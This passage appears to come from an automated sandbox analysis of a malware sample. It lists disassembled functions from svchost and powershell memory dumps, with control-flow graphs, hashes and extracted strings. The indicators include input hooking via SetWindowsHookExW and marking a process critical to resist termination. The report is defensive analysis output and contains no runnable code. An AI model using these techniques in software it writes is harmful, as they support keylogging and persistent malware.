                                                        • Opcode Fuzzy Hash: 4ab0a3fc7d63b9f42bb85ac10d5a7e15b966ab54816bb42afb3e43e0d59d755f
                                                        • Instruction Fuzzy Hash: BA32C320F2EA495FEB94FB38945A7B9B3D2FF98784F540579D00EC3286DF28A8058745
                                                        Function 00007FF848DA16DE Relevance: .7, Instructions: 714COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 928 7ff848da16de-7ff848da16ea 929 7ff848da1734-7ff848da1750 928->929 930 7ff848da16ec-7ff848da170b 928->930 932 7ff848da1756-7ff848da1764 call 7ff848da0638 929->932 933 7ff848da1f7f-7ff848da1fc6 929->933 935 7ff848da170d-7ff848da1715 930->935 936 7ff848da177c-7ff848da1780 930->936 943 7ff848da1769-7ff848da1787 call 7ff848da0638 932->943 939 7ff848da178c-7ff848da1885 call 7ff848da0638 * 6 call 7ff848da0a48 936->939 940 7ff848da1787 call 7ff848da0638 936->940 978 7ff848da1887-7ff848da188e 939->978 979 7ff848da188f call 7ff848da04b8 939->979 940->939 943->939 978->979 982 7ff848da1894-7ff848da1895 call 7ff848da04b0 979->982 984 7ff848da189a-7ff848da18c2 982->984 986 7ff848da18c4-7ff848da18d4 call 7ff848da0358 984->986 988 7ff848da18d9-7ff848da1906 call 7ff848da0368 986->988 994 7ff848da1919-7ff848da1929 988->994 995 7ff848da1908-7ff848da1912 988->995 998 7ff848da1951-7ff848da1971 994->998 999 7ff848da192b-7ff848da1944 call 7ff848da0358 994->999 995->994 1005 7ff848da1973-7ff848da197d call 7ff848da0378 998->1005 1006 7ff848da1982-7ff848da19e6 call 7ff848da1038 998->1006 1003 7ff848da1949-7ff848da194a 999->1003 1003->998 1005->1006 1017 7ff848da1a86-7ff848da1b14 1006->1017 1018 7ff848da19ec-7ff848da1a81 1006->1018 1037 7ff848da1b1b-7ff848da1b38 call 7ff848da0870 call 7ff848da1288 1017->1037 1018->1037 1043 7ff848da1b3d-7ff848da1b79 call 7ff848da0388 1037->1043 1048 7ff848da1b85-7ff848da1b97 call 7ff848da0398 1043->1048 1051 7ff848da1ba1-7ff848da1bc8 1048->1051 1053 7ff848da1bcf-7ff848da1bdb 1051->1053 1054 7ff848da1be7-7ff848da1c17 1053->1054 1059 7ff848da1c22-7ff848da1c4a 1054->1059 1060 7ff848da1c51-7ff848da1c59 1059->1060 1061 7ff848da1ca7-7ff848da1cda 1060->1061 1062 7ff848da1c5b-7ff848da1c8e 1060->1062 1072 7ff848da1cdc-7ff848da1cf6 1061->1072 1073 7ff848da1cff-7ff848da1d2f 1061->1073 1062->1061 1069 7ff848da1c90-7ff848da1c9d 1062->1069 1069->1061 1074 7ff848da1c9f-7ff848da1ca5 1069->1074 1076 7ff848da1cfd 1072->1076 1075 7ff848da1d37-7ff848da1d6e 1073->1075 1074->1061 1082 7ff848da1d70-7ff848da1d91 1075->1082 1083 7ff848da1d93-7ff848da1dc3 1075->1083 1076->1075 1084 7ff848da1dcb-7ff848da1dda 1082->1084 1083->1084 1086 7ff848da1ddc-7ff848da1e07 1084->1086 1087 7ff848da1e0e-7ff848da1e15 1086->1087 1088 7ff848da1e17-7ff848da1e2c call 7ff848da03a8 1087->1088 1090 7ff848da1e31-7ff848da1e8e call 7ff848da09e8 1088->1090 1098 7ff848da1e95-7ff848da1e96 1090->1098 1099 7ff848da1e9d-7ff848da1ea3 call 7ff848da1038 1098->1099 1102 7ff848da1eab-7ff848da1ead 1099->1102 1103 7ff848da1eb4-7ff848da1f4d 1102->1103 1104 7ff848da1eaf call 7ff848da1220 1102->1104 1104->1103
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15ea41c81ac9b79b066dbf9fcbae445512917a6c22999f68697735eb75469ab0
                                                        • Instruction ID: c7b731480822d453621cc4663c71a2c663ec812fe5b5e48895bb8184569ddc33
                                                        • Opcode Fuzzy Hash: 15ea41c81ac9b79b066dbf9fcbae445512917a6c22999f68697735eb75469ab0
                                                        • Instruction Fuzzy Hash: 0E22E220F2EA495FEB98FB38945A7B976D2FF98780F540579D00EC32C6DF28A8058745
                                                        Function 00007FF848DA172B Relevance: .7, Instructions: 656COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2931972879a33ffc18dec980890f4c99904d30290883b249b363993a56db74f
                                                        • Instruction ID: b3e9fe751012c2f287febc3f8209369746a64660e6feaeee69846429350e5883
                                                        • Opcode Fuzzy Hash: a2931972879a33ffc18dec980890f4c99904d30290883b249b363993a56db74f
                                                        • Instruction Fuzzy Hash: D412E120F2EA495FEB98FB38945A7B972D2FF98780F540579D00EC32C6DF28A8058745
                                                        Function 00007FF848DA60C6 Relevance: .5, Instructions: 477COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 944aa6afb4b577105737974abea393365a3c4371ee2ae1c7c25dc449bdfa684a
                                                        • Instruction ID: 846312e8a9fa30108d68e111fd8960f992caf3465ac61b2697c71222781c5fcf
                                                        • Opcode Fuzzy Hash: 944aa6afb4b577105737974abea393365a3c4371ee2ae1c7c25dc449bdfa684a
                                                        • Instruction Fuzzy Hash: AAF1C03090DA8E8FEBA8EF28DC557E937D1FF54350F14426AE84DC7295CB34A8458B82
                                                        Function 00007FF848DA6E72 Relevance: .5, Instructions: 474COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9725331f749f88d2638d106616f8153b4b1c4a4297f9f3618b8e0aee63b8b372
                                                        • Instruction ID: 0cadaca37613b676faec48f046d015708a78e1fd0d536d4982a0a56ed7feb6f7
                                                        • Opcode Fuzzy Hash: 9725331f749f88d2638d106616f8153b4b1c4a4297f9f3618b8e0aee63b8b372
                                                        • Instruction Fuzzy Hash: D5F1D33090DA8E8FEBA8EF28C8557E937E1EF54350F14826ED84DC7291CF3899458B85
                                                        Function 00007FF848DA20F1 Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc3ee8bd8cb980aafc137fa6a0e0bc36bfbbd1122e8d2b638c7140022b692662
                                                        • Instruction ID: 5513785641692addae64b4983c853aadcec82ffe595ecd45aa1a4e91d1f54e12
                                                        • Opcode Fuzzy Hash: cc3ee8bd8cb980aafc137fa6a0e0bc36bfbbd1122e8d2b638c7140022b692662
                                                        • Instruction Fuzzy Hash: 38511110B1E6C95FD796AB3858643B67FE1DF87255F1801FBE089C7197DE08080AC356
                                                        Function 00007FF848DA8BF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CriticalProcess
                                                        • String ID: L_^
                                                        • API String ID: 2695349919-3397556586
                                                        • Opcode ID: 7f15fc1d0a958aa7710aa4c299ee3101af00fcb6f96943d817c01d7cdac30901
                                                        • Instruction ID: 1e5aa662cd27dcc48ea73a45d48000542efe7457c784a824c6d6fd1ea4672f0b
                                                        • Opcode Fuzzy Hash: 7f15fc1d0a958aa7710aa4c299ee3101af00fcb6f96943d817c01d7cdac30901
                                                        • Instruction Fuzzy Hash: DE31F27190CA488FDB28EB69D845BF97BE0FF55311F14412EE09AD3692CB34A846CB91
                                                        Function 00007FF848DA9DA8 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 451 7ff848da9da8-7ff848da9daf 452 7ff848da9db1-7ff848da9db9 451->452 453 7ff848da9dba-7ff848da9dca 451->453 452->453 454 7ff848da9e14-7ff848da9e2d 453->454 455 7ff848da9dcc-7ff848da9e11 453->455 458 7ff848da9e33-7ff848da9e40 454->458 459 7ff848da9eb9-7ff848da9ebd 454->459 455->454 461 7ff848da9e42-7ff848da9e7f SetWindowsHookExW 458->461 459->461 463 7ff848da9e81 461->463 464 7ff848da9e87-7ff848da9eb8 461->464 463->464
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: b011d9a75d90caa8d1ae2824be8d5ccba153ca3052a824de62aa8fd2e2145ef5
                                                        • Instruction ID: 89848795b2b6147f9ebb5ecbf257567b535e2904f1c7b18fc1f542ace05fa5f7
                                                        • Opcode Fuzzy Hash: b011d9a75d90caa8d1ae2824be8d5ccba153ca3052a824de62aa8fd2e2145ef5
                                                        • Instruction Fuzzy Hash: 81411530A0DA5D9FDB58EBAC98467F97BE1EB59320F10423ED009C3292CB65A856C7C1
                                                        Function 00007FF848DA9885 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 467 7ff848da9885-7ff848da9960 RtlSetProcessIsCritical 473 7ff848da9962 467->473 474 7ff848da9968-7ff848da999d 467->474 473->474
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CriticalProcess
                                                        • String ID:
                                                        • API String ID: 2695349919-0
                                                        • Opcode ID: 990fd797b3d3a009226b24e07daf569f0bdbbf4c9452134aad3290107c03cede
                                                        • Instruction ID: 5f465cac20b412f019633ac692cc7c4b9d28ced29c5554d1a477f07202524600
                                                        • Opcode Fuzzy Hash: 990fd797b3d3a009226b24e07daf569f0bdbbf4c9452134aad3290107c03cede
                                                        • Instruction Fuzzy Hash: 7441233090DB888FDB19DB6898457F97BF0FF56310F14016FD08AC3592CB246846CB91

                                                        Non-executed Functions

                                                        Function 00007FF848DA10A5 Relevance: .2, Instructions: 192COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f162219d9cde18b0c9ca851bf16a5327a84746c1039d8ce025e2e47bb52adce5
                                                        • Instruction ID: 32a553278e48e7013e22b29030d878887e0b223c095786b430578705a8175d3f
                                                        • Opcode Fuzzy Hash: f162219d9cde18b0c9ca851bf16a5327a84746c1039d8ce025e2e47bb52adce5
                                                        • Instruction Fuzzy Hash: 28512627A0F179AAD71177FEB4656F97B10EF423B5F0802B7D14D8E0878E04204A86F9

                                                        Executed Functions

                                                        Function 00007FF848E56605 Relevance: 6.7, Strings: 5, Instructions: 432COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (BI$(BI$(BI$(BI$(BI
                                                        • API String ID: 0-2502998277
                                                        • Opcode ID: 591a6de3a5c5471b6eba7362304fa21698c2dd8dc7a81bcde50b1eddbf5634f4
                                                        • Instruction ID: cc4d8f9a153dfef151c49b7b95230a1207c5b16c9fd05947bcededfef8f99418
                                                        • Opcode Fuzzy Hash: 591a6de3a5c5471b6eba7362304fa21698c2dd8dc7a81bcde50b1eddbf5634f4
                                                        • Instruction Fuzzy Hash: 5ED136B1D0EA8A9FEBA9AB6858145B5BBA0FF06790F0401FED40DC70A3DB289C05C355
                                                        Function 00007FF848E54073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction ID: 880783f4bde7abe47e3227e35860287a8f7591a36455c6cb969da3ca4ea48366
                                                        • Opcode Fuzzy Hash: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction Fuzzy Hash: 785145B2E0CA5A4FE7A9EA6C54116B4B7D2FF55264F5801BAC00EC7197DF24EC05834A
                                                        Function 00007FF848E54370 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction ID: fb14e701e18629e5336440b5b15076bb13e01becc9d17f84f6c6c8893c160641
                                                        • Opcode Fuzzy Hash: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction Fuzzy Hash: 12415CB2E0D9694FE7A9EB6CA4506B4B7D1FF44764F4801BAC04DC3197DB28AC1183D5
                                                        Function 00007FF848E540BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction ID: 937d043ead44c3657f4525b332e0a1bb739bed6dee438f9bdd8e05501ada471b
                                                        • Opcode Fuzzy Hash: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction Fuzzy Hash: 1E2104B2E0D9AB4FE7A9EA6C5550174A2D2FF61394F5901BAC00DC71E2CF28EC14834A
                                                        Function 00007FF848E543BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2206007959.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction ID: ea51fe2cf5c2f45bc7608b4815c51a15eb67607a056e4c99eeb2fa5e8e3b7067
                                                        • Opcode Fuzzy Hash: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction Fuzzy Hash: 131148F2D0D4A64FE6A8F76CA4545B4B7D1FF04794F4800B5C05DC31E6CB28AC508385
                                                        Function 00007FF848D8A042 Relevance: .3, Instructions: 272COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 984475d9de4df1490fc1dc37cc8146c941fc2212bd0cb2c6e825229de054e3f0
                                                        • Instruction ID: 80fadf8ae8dd818ade61fcc29bd63d34d38456cafa2922ede349414150707377
                                                        • Opcode Fuzzy Hash: 984475d9de4df1490fc1dc37cc8146c941fc2212bd0cb2c6e825229de054e3f0
                                                        • Instruction Fuzzy Hash: 1E31862280F6C58FD713A76898766E57F60EF13254F0D01F7D098CF0A7DA181889C366
                                                        Function 00007FF848D89768 Relevance: .1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4483042e94fcd0621697177dfe13e58d3390fbd90de16d7a10e28acd6f48914
                                                        • Instruction ID: 8d7e9ffb32b97951c84b3831cc76578dca07e3f78bbe7041ab8dc2a51dd60092
                                                        • Opcode Fuzzy Hash: d4483042e94fcd0621697177dfe13e58d3390fbd90de16d7a10e28acd6f48914
                                                        • Instruction Fuzzy Hash: DD31D83191CB489FDB18DF5CA8066B97BE0FB99711F00422FE449D3252CB70A855CBC6
                                                        Function 00007FF848C6E383 Relevance: .1, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205003077.00007FF848C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C6D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848c6d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb76e026e75ec0826560002cefd00f469ac6d96bf470397449798352611cb91b
                                                        • Instruction ID: c228f41f07ed721e1d3f0d57ddfc02c4b580cfc54b5b93896310b2f6a754205d
                                                        • Opcode Fuzzy Hash: bb76e026e75ec0826560002cefd00f469ac6d96bf470397449798352611cb91b
                                                        • Instruction Fuzzy Hash: 5A41F07180DBC48FE79ADB2898459523FB0EF52364B2506FFD088CB1A7D625E846C792
                                                        Function 00007FF848D8A62C Relevance: .1, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d608fcf59d9a7d9cb06ef83603fd3d66305792a5996526f3d70b6f75184d133f
                                                        • Instruction ID: 81f3672554fa70961cbef2da011b0b5b7517fa56e67c33a3cac8daeffb5d96c0
                                                        • Opcode Fuzzy Hash: d608fcf59d9a7d9cb06ef83603fd3d66305792a5996526f3d70b6f75184d133f
                                                        • Instruction Fuzzy Hash: 3921263190DB4C8FEB59DBAC984A7E97FF0EB96321F04416FD048C3156DA74A44ACB92
                                                        Function 00007FF848D833B5 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction ID: 224165ec8f45dee36243f959deff86883391830e77b87c6cca6c96d1a77f018c
                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction Fuzzy Hash: A301447111CB084FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3695DB26E882CB45
                                                        Function 00007FF848D8A2A9 Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a85c70c7ce48270da52231c0f387bb177233594d91c6fb87a3a934cea22a9639
                                                        • Instruction ID: cccfdb48dce313453f4066a68cb8af807b801cd4194d574487dc74404e528b14
                                                        • Opcode Fuzzy Hash: a85c70c7ce48270da52231c0f387bb177233594d91c6fb87a3a934cea22a9639
                                                        • Instruction Fuzzy Hash: DDE0123580894C8FDB54EF18945A5E57BA0FF64301F00429BE81DC7120D7719958CBC2

                                                        Non-executed Functions

                                                        Function 00007FF848D88995 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^$N_^$N_^$N_^
                                                        • API String ID: 0-3900292545
                                                        • Opcode ID: 2644d6157c10e2e5027483473912ded8d8d12a7763f19b334cee903c7135e232
                                                        • Instruction ID: 287800b7871519d338fa4edf798178d7579a3416d13189d0db145493c421334d
                                                        • Opcode Fuzzy Hash: 2644d6157c10e2e5027483473912ded8d8d12a7763f19b334cee903c7135e232
                                                        • Instruction Fuzzy Hash: 7141746390F6D25FE356A3295C79295BFA0EF123D4F0D01F7C5988B0D3EA19240E9356
                                                        Function 00007FF848D88BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2205561256.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^4$N_^7$N_^F$N_^J
                                                        • API String ID: 0-3508309026
                                                        • Opcode ID: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                        • Instruction ID: 894b0531ad91375c26087df6b5dd48309ea519f6f194dd81c7074a9dc38eb10a
                                                        • Opcode Fuzzy Hash: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                        • Instruction Fuzzy Hash: 7C213B7760A0259ED3017BBEBC286E93741EF942B4F4501B2D298CF143EA14718A86E5

                                                        Executed Functions

                                                        Function 00007FF848E56605 Relevance: 7.9, Strings: 6, Instructions: 433COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (BI$(BI$(BI$(BI$(BI$X7O>
                                                        • API String ID: 0-3954831695
                                                        • Opcode ID: 7113b942a00d01aec2296bb010dfda4ce501f2e501d0edc85f77abd893d85bc1
                                                        • Instruction ID: b8f0c8d3cd8637db72dd65d7bbe77b99398e503e3d1bb62977f053070ce63f34
                                                        • Opcode Fuzzy Hash: 7113b942a00d01aec2296bb010dfda4ce501f2e501d0edc85f77abd893d85bc1
                                                        • Instruction Fuzzy Hash: 2DD145B1D0EA8A9FE7A9AB6858155B5BBA0FF16790F0401FFD40DC70A3EB289C05C355
                                                        Function 00007FF848E54073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction ID: 880783f4bde7abe47e3227e35860287a8f7591a36455c6cb969da3ca4ea48366
                                                        • Opcode Fuzzy Hash: 1ab3630d74ecf9034d84c837407ad40fe7d82f5021909ac7a2ddecb8eff129dd
                                                        • Instruction Fuzzy Hash: 785145B2E0CA5A4FE7A9EA6C54116B4B7D2FF55264F5801BAC00EC7197DF24EC05834A
                                                        Function 00007FF848E54370 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction ID: fb14e701e18629e5336440b5b15076bb13e01becc9d17f84f6c6c8893c160641
                                                        • Opcode Fuzzy Hash: 5a8bddcaada66ab12cfaa84c182b2957ed4d802807ae038235bcc7b111cd3bd2
                                                        • Instruction Fuzzy Hash: 12415CB2E0D9694FE7A9EB6CA4506B4B7D1FF44764F4801BAC04DC3197DB28AC1183D5
                                                        Function 00007FF848E540BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8>I
                                                        • API String ID: 0-3840705973
                                                        • Opcode ID: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction ID: 937d043ead44c3657f4525b332e0a1bb739bed6dee438f9bdd8e05501ada471b
